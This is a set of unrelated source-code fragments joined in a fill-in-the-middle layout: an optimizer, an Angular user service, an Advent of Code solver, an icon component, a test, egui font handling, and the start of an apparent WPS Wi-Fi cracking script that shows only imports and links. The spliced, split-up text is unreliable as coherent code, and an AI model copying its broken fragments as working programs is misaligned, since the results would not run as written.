deltas: List of deltas of same length.
Returns:
The step-applied operation. A tf.group of tf.assign_add ops.
"""
if len(variables) != len(deltas):
raise TensorforceError("Invalid variables and deltas lists.")
assignments = list()
for variable, delta in zip(variables, deltas):
assignments.append(tf.assign_add(ref=variable, value=delta))
with tf.control_dependencies(control_inputs=assignments):
return util.no_operation()
def tf_minimize(self, variables, **kwargs):
"""
Performs an optimization step.
Args:
variables: List of variables to optimize.
**kwargs: Additional optimizer-specific arguments. The following arguments are used
by some optimizers:
- arguments: Dict of arguments for callables, like fn_loss.
- fn_loss: A callable returning the loss of the current model.
- fn_reference: A callable returning the reference values, in case of a comparative
loss.
- fn_kl_divergence: A callable returning the KL-divergence relative to the
current model.
- sampled_loss: A sampled loss (integer).
- return_estimated_improvement: Returns the estimated improvement resulting from
the natural gradient calculation if true.
- source_variables: List of source variables to synchronize with.
- global_variables: List of global variables to apply the proposed optimization
step to.
Returns:
The optimization operation.
"""
deltas = self.step(variables=variables, **kwargs)
for n in range(len(variables)):
name = variables[n].name
if name[-2:] != ':0':
raise TensorforceError.unexpected()
deltas[n] = self.add_summary(
label=('updates', 'updates-full'), name=(name[:-2] + '-update'), tensor=deltas[n],
mean_variance=True
)
deltas[n] = self.add_summary(
label='updates-full', name=(name[:-2] + '-update'), tensor=deltas[n]
)
with tf.control_dependencies(control_inputs=deltas):
return util.no_operation()
def add_variable(self, name, dtype, shape, is_trainable=False, initializer='zeros'):
if is_trainable:
raise TensorforceError("Invalid trainable variable.")
return super().add_variable(
name=name, dtype=dtype, shape=shape, is_trainable=is_trainable, initializer=initializer
)
| """
Creates the TensorFlow operations for performing an optimization step on the given
variables, including actually changing the values of the variables.
Args:
variables: List of variables to optimize.
**kwargs: Additional arguments depending on the specific optimizer implementation.
For instance, often includes `fn_loss` if a loss function is optimized.
Returns:
List of delta tensors corresponding to the updates for each optimized variable.
"""
raise NotImplementedError |
dummy.service.ts | import { Inject, Injectable } from '@angular/core';
import {HttpClient, HttpHeaders} from '@angular/common/http'
import {USER} from '../model/user'
import { Observable } from 'rxjs';
@Injectable({
providedIn: 'root'
})
export class DummyService {
url: string = 'http://5.252.224.199:3000/';
constructor(private httpclient: HttpClient) {
this.url = "http://5.252.224.199:3000/api";
}
postUser(user: USER): Observable<USER> {
console.log("send post request");
return this.httpclient.post<USER>(this.url,user);
}
deleteUser(id: string | undefined) { | getAllUser(): Observable<USER[]>{
console.log("send get request");
return this.httpclient.get<USER[]>(this.url);
}
} | return this.httpclient.delete(this.url + "/" + id);
}
|
day23.rs | use aoc::{CustomError, Result};
use std::fmt;
use std::ops::{Add, Sub};
use std::str::FromStr;
use lazy_static::lazy_static;
use regex::Regex;
fn main() -> Result<()> {
let s = aoc::read_input()?;
part1(&s)?;
part2(&s)?;
Ok(())
}
fn | (s: &str) -> Result<usize> {
let bots: std::result::Result<Vec<_>, _> =
s.lines().map(|s| s.parse::<Bot>()).collect();
let bots = bots?;
let max = bots.iter().max_by_key(|b| b.radius);
#[cfg(test)]
eprintln!("Bots, {:?}", bots);
if let Some(bot) = max {
eprintln!("Largest {:?}", bot);
let bots_in_range = bots
.iter()
.map(|b| manhattan_distance(bot.pos, b.pos))
.filter(|d| *d <= bot.radius as usize)
.count();
eprintln!("part1: Bots in range {:?}", bots_in_range);
return Ok(bots_in_range);
}
Ok(0)
}
fn part2(s: &str) -> Result<usize> {
let bots: std::result::Result<Vec<_>, _> =
s.lines().map(|s| s.parse::<Bot>()).collect();
let bots = bots?;
#[cfg(test)]
eprintln!("Bots, {:?}", bots);
let min_x = bots.iter().map(|b| b.pos.x).min().unwrap();
let min_y = bots.iter().map(|b| b.pos.y).min().unwrap();
let min_z = bots.iter().map(|b| b.pos.z).min().unwrap();
let max_x = bots.iter().map(|b| b.pos.x).max().unwrap();
let max_y = bots.iter().map(|b| b.pos.y).max().unwrap();
let max_z = bots.iter().map(|b| b.pos.z).max().unwrap();
eprintln!("Min {:?}", (min_x, min_y, min_z));
eprintln!("Max {:?}", (max_x, max_y, max_z));
let tmp = [max_x - min_x, max_y - min_y, max_z - min_z];
let max_size = *tmp.into_iter().max().unwrap();
let mut size = 1;
while size < max_size {
size *= 2;
}
eprintln!("Max size {:?} -> size {}", max_size, size);
let mut spaces = vec![Space {
nr_bots: bots.len(),
pos: (min_x, min_y, min_z).into(),
size,
}];
use std::cmp::Ordering;
while !spaces.is_empty() {
spaces.sort_by(|a, b| match a.nr_bots.cmp(&b.nr_bots) {
Ordering::Equal => match a.dist().cmp(&b.dist()).reverse() {
Ordering::Equal => a.size.cmp(&b.size).reverse(),
other => other,
},
other => other,
});
let current = spaces.pop().unwrap();
if current.size == 1 {
eprintln!("Found {:?}", current);
eprintln!("Part2: {:?}", current.dist());
return Ok(current.dist());
}
let ns = current.size / 2;
let s1 = {
let mut s = Space::at(current.pos + (0, 0, 0), ns);
s.nr_bots = bots.iter().filter(|b| b.in_range(s)).count();
s
};
let s2 = {
let mut s = Space::at(current.pos + (ns, 0, 0), ns);
s.nr_bots = bots.iter().filter(|b| b.in_range(s)).count();
s
};
let s3 = {
let mut s = Space::at(current.pos + (0, ns, 0), ns);
s.nr_bots = bots.iter().filter(|b| b.in_range(s)).count();
s
};
let s4 = {
let mut s = Space::at(current.pos + (0, 0, ns), ns);
s.nr_bots = bots.iter().filter(|b| b.in_range(s)).count();
s
};
let s5 = {
let mut s = Space::at(current.pos + (ns, ns, 0), ns);
s.nr_bots = bots.iter().filter(|b| b.in_range(s)).count();
s
};
let s6 = {
let mut s = Space::at(current.pos + (0, ns, ns), ns);
s.nr_bots = bots.iter().filter(|b| b.in_range(s)).count();
s
};
let s7 = {
let mut s = Space::at(current.pos + (ns, 0, ns), ns);
s.nr_bots = bots.iter().filter(|b| b.in_range(s)).count();
s
};
let s8 = {
let mut s = Space::at(current.pos + (ns, ns, ns), ns);
s.nr_bots = bots.iter().filter(|b| b.in_range(s)).count();
s
};
if s1.nr_bots > 0 {
spaces.push(s1);
}
if s2.nr_bots > 0 {
spaces.push(s2);
}
if s3.nr_bots > 0 {
spaces.push(s3);
}
if s4.nr_bots > 0 {
spaces.push(s4);
}
if s5.nr_bots > 0 {
spaces.push(s5);
}
if s6.nr_bots > 0 {
spaces.push(s6);
}
if s7.nr_bots > 0 {
spaces.push(s7);
}
if s8.nr_bots > 0 {
spaces.push(s8);
}
}
Ok(0)
}
fn manhattan_distance(a: V3, b: V3) -> usize {
((b.x - a.x).abs() + (b.y - a.y).abs() + (b.z - a.z).abs()) as usize
}
#[derive(Debug, Clone, Copy, PartialEq, Eq, Hash, Ord, PartialOrd, Default)]
struct Space {
nr_bots: usize,
/// lower left corner
pos: V3,
size: i64,
}
impl Space {
pub fn at(pos: V3, size: i64) -> Self {
Space {
nr_bots: 0,
pos,
size,
}
}
pub fn dist(&self) -> usize {
manhattan_distance(self.pos, V3 { x: 0, y: 0, z: 0 })
}
}
#[derive(Debug, Clone, Copy, PartialEq, Eq, Hash, Ord, PartialOrd, Default)]
struct Bot {
pos: V3,
radius: i64,
}
impl Bot {
fn in_range(&self, space: Space) -> bool {
let min = space.pos;
let max = space.pos + (space.size - 1, space.size - 1, space.size - 1);
let mut d = 0;
if self.pos.x > max.x {
d += (self.pos.x - max.x).abs() as i64
}
if self.pos.x < min.x {
d += (min.x - self.pos.x).abs() as i64
}
if self.pos.y > max.y {
d += (self.pos.y - max.y).abs() as i64
}
if self.pos.y < min.y {
d += (min.y - self.pos.y).abs() as i64
}
if self.pos.z > max.z {
d += (self.pos.z - max.z).abs() as i64
}
if self.pos.z < min.z {
d += (min.z - self.pos.z).abs() as i64
}
d <= self.radius
}
}
impl FromStr for Bot {
type Err = CustomError;
fn from_str(s: &str) -> std::result::Result<Self, Self::Err> {
lazy_static! {
// pos=<0,0,0>, r=4
static ref RE: Regex = Regex::new(r"pos=<([\d\-]+),([\d\-]+),([\d\-]+)>, r=(\d+)").unwrap();
}
let caps = RE
.captures(s)
.ok_or_else(|| CustomError("Invalid captures".to_owned()))?;
let x = aoc::get_value(&caps, 1)?;
let y = aoc::get_value(&caps, 2)?;
let z = aoc::get_value(&caps, 3)?;
let r = aoc::get_value(&caps, 4)?;
Ok(Bot {
pos: V3 { x, y, z },
radius: r,
})
}
}
#[derive(Clone, Copy, PartialEq, Eq, Hash, Ord, PartialOrd, Default)]
pub struct V3 {
pub x: i64,
pub y: i64,
pub z: i64,
}
impl std::convert::From<(i64, i64, i64)> for V3 {
fn from(v: (i64, i64, i64)) -> Self {
V3 {
x: v.0,
y: v.1,
z: v.2,
}
}
}
impl fmt::Debug for V3 {
fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
write!(f, "({}, {}, {})", self.x, self.y, self.z)
}
}
impl fmt::Display for V3 {
fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
write!(f, "{:?}", self)
}
}
macro_rules! impl_ops {
($tp: ty, $p: pat => $x:expr, $y:expr, $z:expr) => {
impl Add<$tp> for V3 {
type Output = V3;
fn add(self, $p: $tp) -> Self::Output {
V3 {
x: self.x + $x,
y: self.y + $y,
z: self.z + $z,
}
}
}
impl Sub<$tp> for V3 {
type Output = V3;
fn sub(self, $p: $tp) -> Self::Output {
V3 {
x: self.x - $x,
y: self.y - $y,
z: self.z - $z,
}
}
}
};
}
impl_ops!(V3, p => p.x, p.y, p.z);
impl_ops!((i64, i64, i64), p => p.0, p.1, p.2);
#[cfg(test)]
mod tests {
use super::*;
#[test]
fn part1_example_input() {
let input = r"
pos=<0,0,0>, r=4
pos=<1,0,0>, r=1
pos=<4,0,0>, r=3
pos=<0,2,0>, r=1
pos=<0,5,0>, r=3
pos=<0,0,3>, r=1
pos=<1,1,1>, r=1
pos=<1,1,2>, r=1
pos=<1,3,1>, r=1
";
assert_eq!(7, part1(input.trim()).unwrap());
}
#[test]
fn part2_example_input() {
let input = r"
pos=<10,12,12>, r=2
pos=<12,14,12>, r=2
pos=<16,12,12>, r=4
pos=<14,14,14>, r=6
pos=<50,50,50>, r=200
pos=<10,10,10>, r=5
";
assert_eq!(36, part2(input.trim()).unwrap());
}
}
| part1 |
icon_pinch.rs |
pub struct IconPinch {
props: crate::Props,
}
impl yew::Component for IconPinch {
type Properties = crate::Props;
type Message = ();
fn create(props: Self::Properties, _: yew::prelude::ComponentLink<Self>) -> Self
{
Self { props }
}
fn | (&mut self, _: Self::Message) -> yew::prelude::ShouldRender
{
true
}
fn change(&mut self, _: Self::Properties) -> yew::prelude::ShouldRender
{
false
}
fn view(&self) -> yew::prelude::Html
{
yew::prelude::html! {
<svg
class=self.props.class.unwrap_or("")
width=self.props.size.unwrap_or(24).to_string()
height=self.props.size.unwrap_or(24).to_string()
viewBox="0 0 24 24"
fill=self.props.fill.unwrap_or("none")
stroke=self.props.color.unwrap_or("currentColor")
stroke-width=self.props.stroke_width.unwrap_or(2).to_string()
stroke-linecap=self.props.stroke_linecap.unwrap_or("round")
stroke-linejoin=self.props.stroke_linejoin.unwrap_or("round")
>
<svg xmlns="http://www.w3.org/2000/svg" enable-background="new 0 0 24 24" height="24" viewBox="0 0 24 24" width="24"><g><rect fill="none" height="24" width="24"/></g><g><path d="M23.18,15.4L22.1,23h-9L8,17.62l1.22-1.23L13,17.24V6.5C13,5.67,13.67,5,14.5,5S16,5.67,16,6.5v6h1.38L23.18,15.4z M6,2.5 V1h5v5H9.5V3.56L3.56,9.5H6V11H1V6h1.5v2.44L8.44,2.5H6z"/></g></svg>
</svg>
}
}
}
| update |
test_common_base_transport.py | # Copyright 2018, OpenCensus Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
class TestCommonBaseTransport(unittest.TestCase):
def test_export_abstract(self):
|
def test_flush_abstract_and_optional(self):
from opencensus.common.transports import base
transport = base.Transport()
transport.flush()
| from opencensus.common.transports import base
transport = base.Transport()
trace = {}
with self.assertRaises(NotImplementedError):
transport.export(trace) |
fonts.rs | use std::collections::BTreeMap;
use crate::{
mutex::{Arc, Mutex, MutexGuard},
text::{
font::{Font, FontImpl},
Galley, LayoutJob,
},
TextureAtlas,
};
use emath::NumExt as _;
// ----------------------------------------------------------------------------
/// How to select a sized font.
#[derive(Clone, Debug, PartialEq)]
#[cfg_attr(feature = "serde", derive(serde::Deserialize, serde::Serialize))]
pub struct FontId {
/// Height in points.
pub size: f32,
/// What font family to use.
pub family: FontFamily,
// TODO: weight (bold), italics, …
}
impl Default for FontId {
#[inline]
fn default() -> Self {
Self {
size: 14.0,
family: FontFamily::Proportional,
}
}
}
impl FontId {
#[inline]
pub fn new(size: f32, family: FontFamily) -> Self {
Self { size, family }
}
#[inline]
pub fn proportional(size: f32) -> Self {
Self::new(size, FontFamily::Proportional)
}
#[inline]
pub fn monospace(size: f32) -> Self {
Self::new(size, FontFamily::Monospace)
}
}
#[allow(clippy::derive_hash_xor_eq)]
impl std::hash::Hash for FontId {
#[inline(always)]
fn hash<H: std::hash::Hasher>(&self, state: &mut H) {
let Self { size, family } = self;
crate::f32_hash(state, *size);
family.hash(state);
}
}
// ----------------------------------------------------------------------------
/// Font of unknown size.
///
/// Which style of font: [`Monospace`][`FontFamily::Monospace`], [`Proportional`][`FontFamily::Proportional`],
/// or by user-chosen name.
#[derive(Clone, Debug, Eq, Hash, Ord, PartialEq, PartialOrd)]
#[cfg_attr(feature = "serde", derive(serde::Deserialize, serde::Serialize))]
pub enum FontFamily {
/// A font where some characters are wider than other (e.g. 'w' is wider than 'i').
///
/// Proportional fonts are easier to read and should be the preferred choice in most situations.
Proportional,
/// A font where each character is the same width (`w` is the same width as `i`).
///
/// Useful for code snippets, or when you need to align numbers or text.
Monospace,
/// One of the names in [`FontDefinitions::families`].
///
/// ```
/// # use epaint::FontFamily;
/// // User-chosen names:
/// FontFamily::Name("arial".into());
/// FontFamily::Name("serif".into());
/// ```
Name(Arc<str>),
}
impl Default for FontFamily {
#[inline]
fn default() -> Self {
FontFamily::Proportional
}
}
impl std::fmt::Display for FontFamily {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
match self {
Self::Monospace => "Monospace".fmt(f),
Self::Proportional => "Proportional".fmt(f),
Self::Name(name) => (*name).fmt(f),
}
}
}
// ----------------------------------------------------------------------------
/// A `.ttf` or `.otf` file and a font face index.
#[derive(Clone, Debug, PartialEq)]
#[cfg_attr(feature = "serde", derive(serde::Deserialize, serde::Serialize))]
pub struct FontData {
/// The content of a `.ttf` or `.otf` file.
pub font: std::borrow::Cow<'static, [u8]>,
/// Which font face in the file to use.
/// When in doubt, use `0`.
pub index: u32,
/// Extra scale and vertical tweak to apply to all text of this font.
pub tweak: FontTweak,
}
impl FontData {
pub fn from_static(font: &'static [u8]) -> Self {
Self {
font: std::borrow::Cow::Borrowed(font),
index: 0,
tweak: Default::default(),
}
}
pub fn from_owned(font: Vec<u8>) -> Self {
Self {
font: std::borrow::Cow::Owned(font),
index: 0,
tweak: Default::default(),
}
}
pub fn tweak(self, tweak: FontTweak) -> Self {
Self { tweak, ..self }
}
}
// ----------------------------------------------------------------------------
/// Extra scale and vertical tweak to apply to all text of a certain font.
#[derive(Copy, Clone, Debug, PartialEq)]
#[cfg_attr(feature = "serde", derive(serde::Deserialize, serde::Serialize))]
pub struct FontTweak {
/// Scale the font by this much.
///
/// Default: `1.0` (no scaling).
pub scale: f32,
/// Shift font downwards by this fraction of the font size (in points).
///
/// A positive value shifts the text upwards.
/// A negative value shifts it downwards.
///
/// Example value: `-0.2`.
pub y_offset_factor: f32,
/// Shift font downwards by this amount of logical points.
///
/// Example value: `-1.0`.
pub y_offset: f32,
}
impl Default for FontTweak {
fn default() -> Self {
Self {
scale: 1.0,
y_offset_factor: -0.2, // makes the default fonts look more centered in buttons and such
y_offset: 0.0,
}
}
}
// ----------------------------------------------------------------------------
fn ab_glyph_font_from_font_data(name: &str, data: &FontData) -> ab_glyph::FontArc {
match &data.font {
std::borrow::Cow::Borrowed(bytes) => {
ab_glyph::FontRef::try_from_slice_and_index(bytes, data.index)
.map(ab_glyph::FontArc::from)
}
std::borrow::Cow::Owned(bytes) => {
ab_glyph::FontVec::try_from_vec_and_index(bytes.clone(), data.index)
.map(ab_glyph::FontArc::from)
}
}
.unwrap_or_else(|err| panic!("Error parsing {:?} TTF/OTF font file: {}", name, err))
}
/// Describes the font data and the sizes to use.
///
/// Often you would start with [`FontDefinitions::default()`] and then add/change the contents.
///
/// This is how you install your own custom fonts:
/// ```
/// # use {epaint::text::{FontDefinitions, FontFamily, FontData}};
/// # struct FakeEguiCtx {};
/// # impl FakeEguiCtx { fn set_fonts(&self, _: FontDefinitions) {} }
/// # let egui_ctx = FakeEguiCtx {};
/// let mut fonts = FontDefinitions::default();
///
/// // Install my own font (maybe supporting non-latin characters):
/// fonts.font_data.insert("my_font".to_owned(),
/// FontData::from_static(include_bytes!("../../fonts/Ubuntu-Light.ttf"))); // .ttf and .otf supported
///
/// // Put my font first (highest priority):
/// fonts.families.get_mut(&FontFamily::Proportional).unwrap()
/// .insert(0, "my_font".to_owned());
///
/// // Put my font as last fallback for monospace:
/// fonts.families.get_mut(&FontFamily::Monospace).unwrap()
/// .push("my_font".to_owned());
///
/// egui_ctx.set_fonts(fonts);
/// ```
#[derive(Clone, Debug, PartialEq)]
#[cfg_attr(feature = "serde", derive(serde::Deserialize, serde::Serialize))]
#[cfg_attr(feature = "serde", serde(default))]
pub struct FontDefinitions {
/// List of font names and their definitions.
///
/// `epaint` has built-in-default for these, but you can override them if you like.
pub font_data: BTreeMap<String, FontData>,
| /// Which fonts (names) to use for each [`FontFamily`].
///
/// The list should be a list of keys into [`Self::font_data`].
/// When looking for a character glyph `epaint` will start with
/// the first font and then move to the second, and so on.
/// So the first font is the primary, and then comes a list of fallbacks in order of priority.
// TODO: per font size-modifier.
pub families: BTreeMap<FontFamily, Vec<String>>,
}
impl Default for FontDefinitions {
fn default() -> Self {
#[allow(unused)]
let mut font_data: BTreeMap<String, FontData> = BTreeMap::new();
let mut families = BTreeMap::new();
#[cfg(feature = "default_fonts")]
{
font_data.insert(
"Hack".to_owned(),
FontData::from_static(include_bytes!("../../fonts/Hack-Regular.ttf")),
);
font_data.insert(
"Ubuntu-Light".to_owned(),
FontData::from_static(include_bytes!("../../fonts/Ubuntu-Light.ttf")),
);
// Some good looking emojis. Use as first priority:
font_data.insert(
"NotoEmoji-Regular".to_owned(),
FontData::from_static(include_bytes!("../../fonts/NotoEmoji-Regular.ttf")),
);
// Bigger emojis, and more. <http://jslegers.github.io/emoji-icon-font/>:
font_data.insert(
"emoji-icon-font".to_owned(),
FontData::from_static(include_bytes!("../../fonts/emoji-icon-font.ttf")).tweak(
FontTweak {
scale: 0.8, // make it smaller
y_offset_factor: 0.07, // move it down slightly
y_offset: 0.0,
},
),
);
families.insert(
FontFamily::Monospace,
vec![
"Hack".to_owned(),
"Ubuntu-Light".to_owned(), // fallback for √ etc
"NotoEmoji-Regular".to_owned(),
"emoji-icon-font".to_owned(),
],
);
families.insert(
FontFamily::Proportional,
vec![
"Ubuntu-Light".to_owned(),
"NotoEmoji-Regular".to_owned(),
"emoji-icon-font".to_owned(),
],
);
}
#[cfg(not(feature = "default_fonts"))]
{
families.insert(FontFamily::Monospace, vec![]);
families.insert(FontFamily::Proportional, vec![]);
}
Self {
font_data,
families,
}
}
}
// ----------------------------------------------------------------------------
/// The collection of fonts used by `epaint`.
///
/// Required in order to paint text.
/// Create one and reuse. Cheap to clone.
///
/// You need to call [`Self::begin_frame`] and [`Self::font_image_delta`] once every frame.
///
/// Wrapper for `Arc<Mutex<FontsAndCache>>`.
pub struct Fonts(Arc<Mutex<FontsAndCache>>);
impl Fonts {
/// Create a new [`Fonts`] for text layout.
/// This call is expensive, so only create one [`Fonts`] and then reuse it.
///
/// * `pixels_per_point`: how many physical pixels per logical "point".
/// * `max_texture_side`: largest supported texture size (one side).
pub fn new(
pixels_per_point: f32,
max_texture_side: usize,
definitions: FontDefinitions,
) -> Self {
let fonts_and_cache = FontsAndCache {
fonts: FontsImpl::new(pixels_per_point, max_texture_side, definitions),
galley_cache: Default::default(),
};
Self(Arc::new(Mutex::new(fonts_and_cache)))
}
/// Call at the start of each frame with the latest known
/// `pixels_per_point` and `max_texture_side`.
///
/// Call after painting the previous frame, but before using [`Fonts`] for the new frame.
///
/// This function will react to changes in `pixels_per_point` and `max_texture_side`,
/// as well as notice when the font atlas is getting full, and handle that.
pub fn begin_frame(&self, pixels_per_point: f32, max_texture_side: usize) {
let mut fonts_and_cache = self.0.lock();
let pixels_per_point_changed =
(fonts_and_cache.fonts.pixels_per_point - pixels_per_point).abs() > 1e-3;
let max_texture_side_changed = fonts_and_cache.fonts.max_texture_side != max_texture_side;
let font_atlas_almost_full = fonts_and_cache.fonts.atlas.lock().fill_ratio() > 0.8;
let needs_recreate =
pixels_per_point_changed || max_texture_side_changed || font_atlas_almost_full;
if needs_recreate {
let definitions = fonts_and_cache.fonts.definitions.clone();
*fonts_and_cache = FontsAndCache {
fonts: FontsImpl::new(pixels_per_point, max_texture_side, definitions),
galley_cache: Default::default(),
};
}
fonts_and_cache.galley_cache.flush_cache();
}
/// Call at the end of each frame (before painting) to get the change to the font texture since last call.
pub fn font_image_delta(&self) -> Option<crate::ImageDelta> {
self.lock().fonts.atlas.lock().take_delta()
}
/// Access the underlying [`FontsAndCache`].
#[doc(hidden)]
#[inline]
pub fn lock(&self) -> MutexGuard<'_, FontsAndCache> {
self.0.lock()
}
#[inline]
pub fn pixels_per_point(&self) -> f32 {
self.lock().fonts.pixels_per_point
}
#[inline]
pub fn max_texture_side(&self) -> usize {
self.lock().fonts.max_texture_side
}
/// Current size of the font image.
/// Pass this to [`crate::Tessellator`].
pub fn font_image_size(&self) -> [usize; 2] {
self.lock().fonts.atlas.lock().size()
}
/// Width of this character in points.
#[inline]
pub fn glyph_width(&self, font_id: &FontId, c: char) -> f32 {
self.lock().fonts.glyph_width(font_id, c)
}
/// Height of one row of text in points
#[inline]
pub fn row_height(&self, font_id: &FontId) -> f32 {
self.lock().fonts.row_height(font_id)
}
/// List of all known font families.
pub fn families(&self) -> Vec<FontFamily> {
self.lock()
.fonts
.definitions
.families
.keys()
.cloned()
.collect()
}
/// Layout some text.
///
/// This is the most advanced layout function.
/// See also [`Self::layout`], [`Self::layout_no_wrap`] and
/// [`Self::layout_delayed_color`].
///
/// The implementation uses memoization so repeated calls are cheap.
#[inline]
pub fn layout_job(&self, job: LayoutJob) -> Arc<Galley> {
self.lock().layout_job(job)
}
pub fn num_galleys_in_cache(&self) -> usize {
self.lock().galley_cache.num_galleys_in_cache()
}
/// How full is the font atlas?
///
/// This increases as new fonts and/or glyphs are used,
/// but can also decrease in a call to [`Self::begin_frame`].
pub fn font_atlas_fill_ratio(&self) -> f32 {
self.lock().fonts.atlas.lock().fill_ratio()
}
/// Will wrap text at the given width and line break at `\n`.
///
/// The implementation uses memoization so repeated calls are cheap.
pub fn layout(
&self,
text: String,
font_id: FontId,
color: crate::Color32,
wrap_width: f32,
) -> Arc<Galley> {
let job = LayoutJob::simple(text, font_id, color, wrap_width);
self.layout_job(job)
}
/// Will line break at `\n`.
///
/// The implementation uses memoization so repeated calls are cheap.
pub fn layout_no_wrap(
&self,
text: String,
font_id: FontId,
color: crate::Color32,
) -> Arc<Galley> {
let job = LayoutJob::simple(text, font_id, color, f32::INFINITY);
self.layout_job(job)
}
/// Like [`Self::layout`], made for when you want to pick a color for the text later.
///
/// The implementation uses memoization so repeated calls are cheap.
pub fn layout_delayed_color(
&self,
text: String,
font_id: FontId,
wrap_width: f32,
) -> Arc<Galley> {
self.layout_job(LayoutJob::simple(
text,
font_id,
crate::Color32::TEMPORARY_COLOR,
wrap_width,
))
}
}
// ----------------------------------------------------------------------------
pub struct FontsAndCache {
pub fonts: FontsImpl,
galley_cache: GalleyCache,
}
impl FontsAndCache {
fn layout_job(&mut self, job: LayoutJob) -> Arc<Galley> {
self.galley_cache.layout(&mut self.fonts, job)
}
}
// ----------------------------------------------------------------------------
/// The collection of fonts used by `epaint`.
///
/// Required in order to paint text.
pub struct FontsImpl {
pixels_per_point: f32,
max_texture_side: usize,
definitions: FontDefinitions,
atlas: Arc<Mutex<TextureAtlas>>,
font_impl_cache: FontImplCache,
sized_family: ahash::AHashMap<(u32, FontFamily), Font>,
}
impl FontsImpl {
/// Create a new [`FontsImpl`] for text layout.
/// This call is expensive, so only create one [`FontsImpl`] and then reuse it.
pub fn new(
pixels_per_point: f32,
max_texture_side: usize,
definitions: FontDefinitions,
) -> Self {
assert!(
0.0 < pixels_per_point && pixels_per_point < 100.0,
"pixels_per_point out of range: {}",
pixels_per_point
);
let texture_width = max_texture_side.at_most(8 * 1024);
let initial_height = 64;
let mut atlas = TextureAtlas::new([texture_width, initial_height]);
{
// Make the top left pixel fully white:
let (pos, image) = atlas.allocate((1, 1));
assert_eq!(pos, (0, 0));
image[pos] = 255;
}
let atlas = Arc::new(Mutex::new(atlas));
let font_impl_cache =
FontImplCache::new(atlas.clone(), pixels_per_point, &definitions.font_data);
Self {
pixels_per_point,
max_texture_side,
definitions,
atlas,
font_impl_cache,
sized_family: Default::default(),
}
}
#[inline(always)]
pub fn pixels_per_point(&self) -> f32 {
self.pixels_per_point
}
#[inline]
pub fn definitions(&self) -> &FontDefinitions {
&self.definitions
}
/// Get the right font implementation from size and [`FontFamily`].
pub fn font(&mut self, font_id: &FontId) -> &mut Font {
let FontId { size, family } = font_id;
let scale_in_pixels = self.font_impl_cache.scale_as_pixels(*size);
self.sized_family
.entry((scale_in_pixels, family.clone()))
.or_insert_with(|| {
let fonts = &self.definitions.families.get(family);
let fonts = fonts.unwrap_or_else(|| {
panic!("FontFamily::{:?} is not bound to any fonts", family)
});
let fonts: Vec<Arc<FontImpl>> = fonts
.iter()
.map(|font_name| self.font_impl_cache.font_impl(scale_in_pixels, font_name))
.collect();
Font::new(fonts)
})
}
/// Width of this character in points.
fn glyph_width(&mut self, font_id: &FontId, c: char) -> f32 {
self.font(font_id).glyph_width(c)
}
/// Height of one row of text. In points
fn row_height(&mut self, font_id: &FontId) -> f32 {
self.font(font_id).row_height()
}
}
// ----------------------------------------------------------------------------
struct CachedGalley {
/// When it was last used
last_used: u32,
galley: Arc<Galley>,
}
#[derive(Default)]
struct GalleyCache {
/// Frame counter used to do garbage collection on the cache
generation: u32,
cache: nohash_hasher::IntMap<u64, CachedGalley>,
}
impl GalleyCache {
fn layout(&mut self, fonts: &mut FontsImpl, job: LayoutJob) -> Arc<Galley> {
let hash = crate::util::hash(&job); // TODO: even faster hasher?
match self.cache.entry(hash) {
std::collections::hash_map::Entry::Occupied(entry) => {
let cached = entry.into_mut();
cached.last_used = self.generation;
cached.galley.clone()
}
std::collections::hash_map::Entry::Vacant(entry) => {
let galley = super::layout(fonts, job.into());
let galley = Arc::new(galley);
entry.insert(CachedGalley {
last_used: self.generation,
galley: galley.clone(),
});
galley
}
}
}
pub fn num_galleys_in_cache(&self) -> usize {
self.cache.len()
}
/// Must be called once per frame to clear the [`Galley`] cache.
pub fn flush_cache(&mut self) {
let current_generation = self.generation;
self.cache.retain(|_key, cached| {
cached.last_used == current_generation // only keep those that were used this frame
});
self.generation = self.generation.wrapping_add(1);
}
}
// ----------------------------------------------------------------------------
struct FontImplCache {
atlas: Arc<Mutex<TextureAtlas>>,
pixels_per_point: f32,
ab_glyph_fonts: BTreeMap<String, (FontTweak, ab_glyph::FontArc)>,
/// Map font pixel sizes and names to the cached `FontImpl`.
cache: ahash::AHashMap<(u32, String), Arc<FontImpl>>,
}
impl FontImplCache {
pub fn new(
atlas: Arc<Mutex<TextureAtlas>>,
pixels_per_point: f32,
font_data: &BTreeMap<String, FontData>,
) -> Self {
let ab_glyph_fonts = font_data
.iter()
.map(|(name, font_data)| {
let tweak = font_data.tweak;
let ab_glyph = ab_glyph_font_from_font_data(name, font_data);
(name.clone(), (tweak, ab_glyph))
})
.collect();
Self {
atlas,
pixels_per_point,
ab_glyph_fonts,
cache: Default::default(),
}
}
#[inline]
pub fn scale_as_pixels(&self, scale_in_points: f32) -> u32 {
let scale_in_pixels = self.pixels_per_point * scale_in_points;
// Round to an even number of physical pixels to get even kerning.
// See https://github.com/emilk/egui/issues/382
scale_in_pixels.round() as u32
}
pub fn font_impl(&mut self, scale_in_pixels: u32, font_name: &str) -> Arc<FontImpl> {
let (tweak, ab_glyph_font) = self
.ab_glyph_fonts
.get(font_name)
.unwrap_or_else(|| panic!("No font data found for {:?}", font_name))
.clone();
let scale_in_pixels = (scale_in_pixels as f32 * tweak.scale).round() as u32;
let y_offset_points = {
let scale_in_points = scale_in_pixels as f32 / self.pixels_per_point;
scale_in_points * tweak.y_offset_factor
} + tweak.y_offset;
self.cache
.entry((scale_in_pixels, font_name.to_owned()))
.or_insert_with(|| {
Arc::new(FontImpl::new(
self.atlas.clone(),
self.pixels_per_point,
ab_glyph_font,
scale_in_pixels,
y_offset_points,
))
})
.clone()
}
} | |
wifisky.py | import os
import sys
import subprocess
from os import system
from time import sleep
follow = """
{+}-- https://www.facebook.com/dzmanisso
{+}-- https://twitter.com/ManissoDz
{+}-- https://github.com/Manisso
{+}-- https://www.linkedin.com/in/Manisso
{+}-- https://www.instagram.com/man.i.s/
"""
#Wash is a utility for identifying WPS enabled access points. It can survey from a live interface or it can scan a list of pcap files.
